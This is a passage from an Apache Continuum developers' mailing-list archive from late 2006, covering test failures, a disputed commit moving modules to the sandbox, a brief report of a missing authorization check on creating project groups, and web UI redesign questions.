bmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3Vp bmcgQ0EwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMSmPFVzVftOucqZWh5owHUEcJ3f 6f+jHuy9zfVb8hp2vX8MOmHyv1HOAdTlUAow1wJjWiyJFXCO3cnwK4Vaqj9xVsuvPAsH5/Ef kTYkKhPPK9Xzgnc9A74r/rsYPge/QIACZNenprufZdHFKlSFD0gEf6e20TxhBEAeZBlyYLf7 AgMBAAGjgZQwgZEwEgYDVR0TAQH/BAgwBgEB/wIBADBDBgNVHR8EPDA6MDigNqA0hjJodHRw Oi8vY3JsLnRoYXd0ZS5jb20vVGhhd3RlUGVyc29uYWxGcmVlbWFpbENBLmNybDALBgNVHQ8E BAMCAQYwKQYDVR0RBCIwIKQeMBwxGjAYBgNVBAMTEVByaXZhdGVMYWJlbDItMTM4MA0GCSqG SIb3DQEBBQUAA4GBAEiM0VCD6gsuzA2jZqxnD3+vrL7CF6FDlpSdf0whuPg2H6otnzYvwPQc UCCTcDz9reFhYsPZOhl+hLGZGwDFGguCdJ4lUJRix9sncVcljd2pnDmOjCBPZV+V2vf3h9bG CE6u9uo05RAaWzVNd+NWIXiC3CEZNd4ksdMdRv9dX2VPMYIDZDCCA2ACAQEwdjBiMQswCQYD VQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UE AxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3VpbmcgQ0ECEHPerLP+yWp/U+jCFAQ0 kGwwCQYFKw4DAhoFAKCCAcMwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkqhkiG9w0B CQUxDxcNMDYxMTIxMDgxOTU4WjAjBgkqhkiG9w0BCQQxFgQUFJqOn5lsP8usslM/9I/zVOGS 79gwUgYJKoZIhvcNAQkPMUUwQzAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZI hvcNAwICAUAwBwYFKw4DAgcwDQYIKoZIhvcNAwICASgwgYUGCSsGAQQBgjcQBDF4MHYwYjEL MAkGA1UEBhMCWkExJTAjBgNVBAoTHFRoYXd0ZSBDb25zdWx0aW5nIChQdHkpIEx0ZC4xLDAq BgNVBAMTI1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBJc3N1aW5nIENBAhBz3qyz/slqf1Po whQENJBsMIGHBgsqhkiG9w0BCRACCzF4oHYwYjELMAkGA1UEBhMCWkExJTAjBgNVBAoTHFRo YXd0ZSBDb25zdWx0aW5nIChQdHkpIEx0ZC4xLDAqBgNVBAMTI1RoYXd0ZSBQZXJzb25hbCBG cmVlbWFpbCBJc3N1aW5nIENBAhBz3qyz/slqf1PowhQENJBsMA0GCSqGSIb3DQEBAQUABIIB AEMtKuFuhFFPK2hXgY/cDWvHOURJ4E30J89C4Tx76DU3D+sDaSZGpFOdKg2gdELjcdGP/NfQ TVXYWqlNN+EOHU62nDqfqt6kxYU61CYbaMkiv/sfG95WxbkzEhBEBAvkIoTEhVnoup+owRLC HiqyvYLkDgkbPen3xTy+JIg89aKEeS2cLRr5fmVYSzeN0pewUADZ5s+Upen+qLLmRAGYMwSN zgpkYR3mQWw4pxjhrcaUtmDRfnuP1IHLpRbr5pt63O6LWQoIf5qtXrb62JZOmaAgB83UK360 o/khHK2hUI1zgwf9rdw7kYkmOa/tO+ZHuvdlHto5QOkIBf3jEmBS/CYAAAAAAAA= --------------ms040502000601060604090009-- From [email protected] Tue Nov 21 10:33:31 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94169 invoked from network); 21 Nov 2006 10:33:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Nov 2006 10:33:30 -0000 Received: (qmail 29588 invoked by uid 500); 21 Nov 2006 10:33:39 -0000 Delivered-To: [email protected] Received: (qmail 29562 invoked by uid 500); 21 Nov 2006 10:33:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29548 invoked by uid 99); 21 Nov 2006 10:33:39 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Nov 2006 02:33:39 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO ow-mustang.objectware.no) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Nov 2006 02:33:26 -0800 Received: from [161.129.204.104] (localhost.localdomain [161.129.204.104]) by ow-mustang.objectware.no (161.129.204.10460308/8.12.11) with ESMTP id kALAV6f7001680 for <[email protected]>; Tue, 21 Nov 2006 11:31:07 +0100 Message-ID: <[email protected]> Date: Tue, 21 Nov 2006 11:26:20 +0100 From: =?ISO-8859-1?Q?Trygve_Laugst=F8l?= <[email protected]> User-Agent: Mozilla Thunderbird 1.0.6 (X11/20050811) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: Continuum trunk test failures References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Graham Leggett wrote: > Hi all, > > The current continuum trunk is failing the build with test failues: > > Results : > Tests run: 35, Failures: 0, Errors: 5, Skipped: 0 > > [INFO] > ------------------------------------------------------------------------ > [ERROR] BUILD FAILURE > [INFO] > ------------------------------------------------------------------------ > [INFO] There are test failures. > > I can't seem to find where the failure is though :( They're under target/surefire-reports/*.txt in the module whose tests failed. -- Trygve From [email protected] Mon Nov 27 03:05:20 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52034 invoked from network); 27 Nov 2006 03:05:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Nov 2006 03:05:20 -0000 Received: (qmail 50098 invoked by uid 500); 27 Nov 2006 03:05:29 -0000 Delivered-To: [email protected] Received: (qmail 50079 invoked by uid 500); 27 Nov 2006 03:05:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50068 invoked by uid 99); 27 Nov 2006 03:05:28 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 26 Nov 2006 19:05:28 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-ihug.icp-qv1-irony6.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 26 Nov 2006 19:05:17 -0800 Received: from 124-168-10-146.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by mail-ihug.icp-qv1-irony6.iinet.net.au with ESMTP; 27 Nov 2006 11:04:54 +0800 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAObkaUV8qAqSdGdsb2JhbAANjFEB X-IronPort-AV: i="4.09,461,1157299200"; d="scan'208"; a="556889704:sNHT375452720" Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: svn commit: r479498 - in /maven/continuum/trunk: ./ continuum-cc/ continuum-distributed/ continuum-sandbox/continuum-cc/ continuum-sandbox/continuum-distributed/ continuum-sandbox/continuum-updater/ continuum-sandbox/continuum-xfire/ continuum-updater/... Date: Mon, 27 Nov 2006 14:04:47 +1100 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org erm, I meant 'currently unused', not 'old'. Obviously, we want most of these to be integrated into the project, but I'm just cleaning trunk up to be the code that is actually used in the release for now. On 27/11/2006, at 1:54 PM, [email protected] wrote: > Author: brett > Date: Sun Nov 26 18:54:54 2006 > New Revision: 479498 > > URL: http://svn.apache.org/viewvc?view=rev&rev=479498 > Log: > move old modules to the sandbox From [email protected] Mon Nov 27 05:22:12 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72207 invoked from network); 27 Nov 2006 05:22:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Nov 2006 05:22:12 -0000 Received: (qmail 47989 invoked by uid 500); 27 Nov 2006 05:22:21 -0000 Delivered-To: [email protected] Received: (qmail 47962 invoked by uid 500); 27 Nov 2006 05:22:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47951 invoked by uid 99); 27 Nov 2006 05:22:20 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 26 Nov 2006 21:22:20 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.maven.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 26 Nov 2006 21:22:09 -0800 Received: (qmail 7483 invoked by uid 89); 27 Nov 2006 05:21:48 -0000 Received: from unknown (HELO ?jR?????IPvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b:1?) ([email protected]@161.129.204.104) by mail.maven.org with ESMTPA; 27 Nov 2006 05:21:48 -0000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Jason van Zyl <[email protected]> Subject: Re: svn commit: r479498 - in /maven/continuum/trunk: ./ continuum-cc/ continuum-distributed/ continuum-sandbox/continuum-cc/ continuum-sandbox/continuum-distributed/ continuum-sandbox/continuum-updater/ continuum-sandbox/continuum-xfire/ continuum-updater/... Date: Mon, 27 Nov 2006 00:21:32 -0500 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org continuum-distributed is not an old module, please put that one back. Jason. On 26 Nov 06, at 9:54 PM 26 Nov 06, [email protected] wrote: > Author: brett > Date: Sun Nov 26 18:54:54 2006 > New Revision: 479498 > > URL: http://svn.apache.org/viewvc?view=rev&rev=479498 > Log: > move old modules to the sandbox > > Added: > maven/continuum/trunk/continuum-sandbox/continuum-cc/ > - copied from r479496, maven/continuum/trunk/continuum-cc/ > maven/continuum/trunk/continuum-sandbox/continuum-distributed/ > - copied from r479496, maven/continuum/trunk/continuum- > distributed/ > maven/continuum/trunk/continuum-sandbox/continuum-updater/ > - copied from r479496, maven/continuum/trunk/continuum-updater/ > maven/continuum/trunk/continuum-sandbox/continuum-xfire/ > - copied from r479496, maven/continuum/trunk/continuum-xfire/ > Removed: > maven/continuum/trunk/continuum-cc/ > maven/continuum/trunk/continuum-distributed/ > maven/continuum/trunk/continuum-updater/ > maven/continuum/trunk/continuum-xfire/ > Modified: > maven/continuum/trunk/pom.xml > > Modified: maven/continuum/trunk/pom.xml > URL: http://svn.apache.org/viewvc/maven/continuum/trunk/pom.xml? > view=diff&rev=479498&r1=479497&r2=479498 > ====================================================================== > ======== > --- maven/continuum/trunk/pom.xml (original) > +++ maven/continuum/trunk/pom.xml Sun Nov 26 18:54:54 2006 > @@ -82,7 +82,6 @@ > <modules> > <module>continuum-api</module> > <module>continuum-security</module> > - <module>continuum-cc</module> > <!-- module>continuum-core-it</module --> <!-- TODO RE-ADD > it when continuum-plexus-application will be back --> > <module>continuum-core</module> > <module>continuum-model</module> > @@ -92,7 +91,6 @@ > <module>continuum-rpc-client</module> > <module>continuum-store</module> > <module>continuum-test</module> > - <!-- module>continuum-web</module --> <!--Remove this when > webapp will be ready and packaged as a plexus-application --> > <module>continuum-webapp</module> > <module>continuum-xmlrpc</module> > <module>continuum-release</module> > > > From [email protected] Mon Nov 27 08:48:49 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22550 invoked from network); 27 Nov 2006 08:48:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Nov 2006 08:48:48 -0000 Received: (qmail 58366 invoked by uid 500); 27 Nov 2006 08:48:57 -0000 Delivered-To: [email protected] Received: (qmail 58338 invoked by uid 500); 27 Nov 2006 08:48:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58327 invoked by uid 99); 27 Nov 2006 08:48:57 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Nov 2006 00:48:57 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 27 Nov 2006 00:48:44 -0800 Received: (qmail 10462 invoked from network); 27 Nov 2006 08:48:23 -0000 Received: from 161.129.204.104.9nanterr1-0-ro-bas-1.9tel.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 27 Nov 2006 08:48:23 -0000 Message-ID: <[email protected]> Date: Mon, 27 Nov 2006 09:48:02 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20061025) MIME-Version: 1.0 To: [email protected] Subject: Re: svn commit: r479498 - in /maven/continuum/trunk: ./ continuum-cc/ continuum-distributed/ continuum-sandbox/continuum-cc/ continuum-sandbox/continuum-distributed/ continuum-sandbox/continuum-updater/ continuum-sandbox/continuum-xfire/ continuum-updater/... References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org It's isn't an old module but a not used module, so it should be in sandbox. Emmanuel Jason van Zyl a écrit : > continuum-distributed is not an old module, please put that one back. > > Jason. > > On 26 Nov 06, at 9:54 PM 26 Nov 06, [email protected] wrote: > >> Author: brett >> Date: Sun Nov 26 18:54:54 2006 >> New Revision: 479498 >> >> URL: http://svn.apache.org/viewvc?view=rev&rev=479498 >> Log: >> move old modules to the sandbox >> >> Added: >> maven/continuum/trunk/continuum-sandbox/continuum-cc/ >> - copied from r479496, maven/continuum/trunk/continuum-cc/ >> maven/continuum/trunk/continuum-sandbox/continuum-distributed/ >> - copied from r479496, maven/continuum/trunk/continuum-distributed/ >> maven/continuum/trunk/continuum-sandbox/continuum-updater/ >> - copied from r479496, maven/continuum/trunk/continuum-updater/ >> maven/continuum/trunk/continuum-sandbox/continuum-xfire/ >> - copied from r479496, maven/continuum/trunk/continuum-xfire/ >> Removed: >> maven/continuum/trunk/continuum-cc/ >> maven/continuum/trunk/continuum-distributed/ >> maven/continuum/trunk/continuum-updater/ >> maven/continuum/trunk/continuum-xfire/ >> Modified: >> maven/continuum/trunk/pom.xml >> >> Modified: maven/continuum/trunk/pom.xml >> URL: >> http://svn.apache.org/viewvc/maven/continuum/trunk/pom.xml?view=diff&rev=479498&r1=479497&r2=479498 >> >> ============================================================================== >> >> --- maven/continuum/trunk/pom.xml (original) >> +++ maven/continuum/trunk/pom.xml Sun Nov 26 18:54:54 2006 >> @@ -82,7 +82,6 @@ >> <modules> >> <module>continuum-api</module> >> <module>continuum-security</module> >> - <module>continuum-cc</module> >> <!-- module>continuum-core-it</module --> <!-- TODO RE-ADD it >> when continuum-plexus-application will be back --> >> <module>continuum-core</module> >> <module>continuum-model</module> >> @@ -92,7 +91,6 @@ >> <module>continuum-rpc-client</module> >> <module>continuum-store</module> >> <module>continuum-test</module> >> - <!-- module>continuum-web</module --> <!--Remove this when webapp >> will be ready and packaged as a plexus-application --> >> <module>continuum-webapp</module> >> <module>continuum-xmlrpc</module> >> <module>continuum-release</module> >> >> >> > > > > From [email protected] Mon Nov 27 11:21:30 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 67391 invoked from network); 27 Nov 2006 11:21:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Nov 2006 11:21:29 -0000 Received: (qmail 59375 invoked by uid 500); 27 Nov 2006 11:21:38 -0000 Delivered-To: [email protected] Received: (qmail 59325 invoked by uid 500); 27 Nov 2006 11:21:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 59290 invoked by uid 99); 27 Nov 2006 11:21:38 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Nov 2006 03:21:38 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.maven.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Nov 2006 03:21:26 -0800 Received: (qmail 14859 invoked by uid 89); 27 Nov 2006 11:21:05 -0000 Received: from unknown (HELO ?jR?????IPvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b:1?) ([email protected]@161.129.204.104) by mail.maven.org with ESMTPA; 27 Nov 2006 11:21:05 -0000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: quoted-printable From: Jason van Zyl <[email protected]> Subject: Re: svn commit: r479498 - in /maven/continuum/trunk: ./ continuum-cc/ continuum-distributed/ continuum-sandbox/continuum-cc/ continuum-sandbox/continuum-distributed/ continuum-sandbox/continuum-updater/ continuum-sandbox/continuum-xfire/ continuum-updater/... Date: Mon, 27 Nov 2006 06:20:53 -0500 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org On 27 Nov 06, at 3:48 AM 27 Nov 06, Emmanuel Venisse wrote: > It's isn't an old module but a not used module, so it should be in =20 > sandbox. > That's not true, but as I told Brett I will work sync my stuff back =20 into the sandbox and integrate it later. Jason. > Emmanuel > > Jason van Zyl a =E9crit : >> continuum-distributed is not an old module, please put that one back. >> Jason. >> On 26 Nov 06, at 9:54 PM 26 Nov 06, [email protected] wrote: >>> Author: brett >>> Date: Sun Nov 26 18:54:54 2006 >>> New Revision: 479498 >>> >>> URL: http://svn.apache.org/viewvc?view=3Drev&rev=3D479498 >>> Log: >>> move old modules to the sandbox >>> >>> Added: >>> maven/continuum/trunk/continuum-sandbox/continuum-cc/ >>> - copied from r479496, maven/continuum/trunk/continuum-cc/ >>> maven/continuum/trunk/continuum-sandbox/continuum-distributed/ >>> - copied from r479496, maven/continuum/trunk/continuum-=20 >>> distributed/ >>> maven/continuum/trunk/continuum-sandbox/continuum-updater/ >>> - copied from r479496, maven/continuum/trunk/continuum-=20 >>> updater/ >>> maven/continuum/trunk/continuum-sandbox/continuum-xfire/ >>> - copied from r479496, maven/continuum/trunk/continuum-xfire/ >>> Removed: >>> maven/continuum/trunk/continuum-cc/ >>> maven/continuum/trunk/continuum-distributed/ >>> maven/continuum/trunk/continuum-updater/ >>> maven/continuum/trunk/continuum-xfire/ >>> Modified: >>> maven/continuum/trunk/pom.xml >>> >>> Modified: maven/continuum/trunk/pom.xml >>> URL: http://svn.apache.org/viewvc/maven/continuum/trunk/pom.xml?=20 >>> view=3Ddiff&rev=3D479498&r1=3D479497&r2=3D479498 >>> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=20 >>> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D >>> --- maven/continuum/trunk/pom.xml (original) >>> +++ maven/continuum/trunk/pom.xml Sun Nov 26 18:54:54 2006 >>> @@ -82,7 +82,6 @@ >>> <modules> >>> <module>continuum-api</module> >>> <module>continuum-security</module> >>> - <module>continuum-cc</module> >>> <!-- module>continuum-core-it</module --> <!-- TODO RE-=20 >>> ADD it when continuum-plexus-application will be back --> >>> <module>continuum-core</module> >>> <module>continuum-model</module> >>> @@ -92,7 +91,6 @@ >>> <module>continuum-rpc-client</module> >>> <module>continuum-store</module> >>> <module>continuum-test</module> >>> - <!-- module>continuum-web</module --> <!--Remove this when =20 >>> webapp will be ready and packaged as a plexus-application --> >>> <module>continuum-webapp</module> >>> <module>continuum-xmlrpc</module> >>> <module>continuum-release</module> >>> >>> >>> > > From [email protected] Tue Nov 28 20:42:16 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22029 invoked from network); 28 Nov 2006 20:42:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Nov 2006 20:42:15 -0000 Received: (qmail 58627 invoked by uid 500); 28 Nov 2006 20:42:24 -0000 Delivered-To: [email protected] Received: (qmail 58604 invoked by uid 500); 28 Nov 2006 20:42:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58593 invoked by uid 99); 28 Nov 2006 20:42:23 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Nov 2006 12:42:23 -0800 X-ASF-Spam-Status: No, hits=3.2 required=10.0 tests=HTML_MESSAGE,HTML_OBFUSCATE_05_10 X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp2.israfil.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Nov 2006 12:42:11 -0800 Received: from [161.129.204.104] (unknown [161.129.204.104]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by smtp2.israfil.net (Postfix) with ESMTP id E2958AD43C8 for <[email protected]>; Tue, 28 Nov 2006 16:00:45 -0500 (EST) Message-ID: <[email protected]> Date: Tue, 28 Nov 2006 15:41:45 -0500 From: Christian Edward Gruber <[email protected]> Organization: Israfil Consulting Services Corporation User-Agent: Thunderbird 161.129.204.104 (Windows/20061025) MIME-Version: 1.0 To: [email protected] Subject: "Add project group" button not protected from unauthenticated users. Content-Type: multipart/alternative; boundary="------------030008000905080100030402" X-Virus-Checked: Checked by ClamAV on apache.org --------------030008000905080100030402 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Hey. Just FYI, in the trunk the unauthenticated user (and other logged-in, unempowered users) can create new project groups. Christian. -- *christian** gruber + process coach and architect* *Israfil Consulting Services Corporation* *email** [email protected] + bus 475-205-1887 + mob 475-205-1887* --------------030008000905080100030402-- From [email protected] Fri Dec 01 00:30:18 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12690 invoked from network); 1 Dec 2006 00:30:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Dec 2006 00:30:17 -0000 Received: (qmail 35143 invoked by uid 500); 1 Dec 2006 00:30:16 -0000 Delivered-To: [email protected] Received: (qmail 35072 invoked by uid 500); 1 Dec 2006 00:30:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35007 invoked by uid 99); 1 Dec 2006 00:30:15 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 30 Nov 2006 16:30:15 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO customer-domains.icp-qv1-irony14.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 30 Nov 2006 16:30:02 -0800 Received: from 124-168-10-146.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by iinet-mail.icp-qv1-irony14.iinet.net.au with ESMTP; 01 Dec 2006 08:29:37 +0800 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAKMFb0V8qAqSdGdsb2JhbAANjF8B X-IronPort-AV: i="4.09,482,1157299200"; d="scan'208"; a="42998364:sNHT32393412" Mime-Version: 1.0 (Apple Message framework v752.3) Content-Transfer-Encoding: 7bit Message-Id: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed To: Continuum Developers <[email protected]> From: Brett Porter <[email protected]> Subject: continuum-webapp models Date: Fri, 1 Dec 2006 11:29:34 +1100 X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org I see a couple of models in continuum-webapp, which seem to be partially used. Does anyone know if session-models is used any more? What about view-models - only the summary parts still seem valid? - Brett From [email protected] Fri Dec 01 01:47:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27866 invoked from network); 1 Dec 2006 01:47:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Dec 2006 01:47:12 -0000 Received: (qmail 13359 invoked by uid 500); 1 Dec 2006 01:47:21 -0000 Delivered-To: [email protected] Received: (qmail 13231 invoked by uid 500); 1 Dec 2006 01:47:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13220 invoked by uid 99); 1 Dec 2006 01:47:21 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 30 Nov 2006 17:47:21 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-ihug.icp-qv1-irony6.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 30 Nov 2006 17:47:09 -0800 Received: from 124-168-10-146.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by mail-ihug.icp-qv1-irony6.iinet.net.au with ESMTP; 01 Dec 2006 09:46:46 +0800 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAACYYb0V8qAqSdGdsb2JhbAANjF8B X-IronPort-AV: i="4.09,482,1157299200"; d="scan'208"; a="562144094:sNHT388287042" Mime-Version: 1.0 (Apple Message framework v752.3) Content-Transfer-Encoding: 7bit Message-Id: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed To: Continuum Developers <[email protected]> From: Brett Porter <[email protected]> Subject: Changes to configuration Date: Fri, 1 Dec 2006 12:46:41 +1100 X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org Hi, I've started to redevelop the white site, starting with some configuration changes I'm making today: http://people.apache.org/~brett/continuum-white-site/admin/ appearance.html Thoughts? - Brett